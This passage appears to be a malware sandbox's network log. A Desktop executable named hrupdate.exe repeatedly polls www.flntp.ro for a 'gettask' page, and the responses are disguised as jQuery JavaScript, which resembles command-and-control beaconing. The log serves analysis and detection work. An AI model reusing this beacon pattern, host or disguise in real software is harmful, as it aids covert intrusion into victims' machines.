Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:25 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:25 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5713
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:25 UTC | 5713 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49745 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:27 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:27 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:27 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5607
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:27 UTC | 5607 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49747 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:29 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:30 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:29 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5649
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:30 UTC | 5649 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49748 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:31 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:32 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:32 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5628
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:32 UTC | 5628 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49749 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:33 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:34 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:34 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5628
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:34 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49750 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:36 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:37 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:36 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5713
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:37 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49751 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:38 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:39 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:39 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5692
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:39 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49752 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:40 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:41 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:41 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5649
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:41 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49753 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:42 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:43 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:43 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5628
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:43 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49754 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:45 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:45 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:45 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5671
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:45 UTC | 5671 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49755 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:47 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:48 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:47 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5607
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:48 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49756 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:49 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:50 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:50 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5649
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:50 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49757 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:51 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:52 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:52 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5649
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:52 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49758 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:54 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:54 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:54 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5607
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:54 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              21 | 192.168.2.4 | 49759 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:40:56 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:57 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:57 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:57 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              22 | 192.168.2.4 | 49760 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:40:58 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:59 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:59 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:59 UTC | 5671 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              23 | 192.168.2.4 | 49762 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:01 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:01 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:01 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:01 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              24 | 192.168.2.4 | 49769 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:03 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:04 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:03 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:04 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              25 | 192.168.2.4 | 49775 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:05 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:06 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:06 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:06 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              26 | 192.168.2.4 | 49781 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
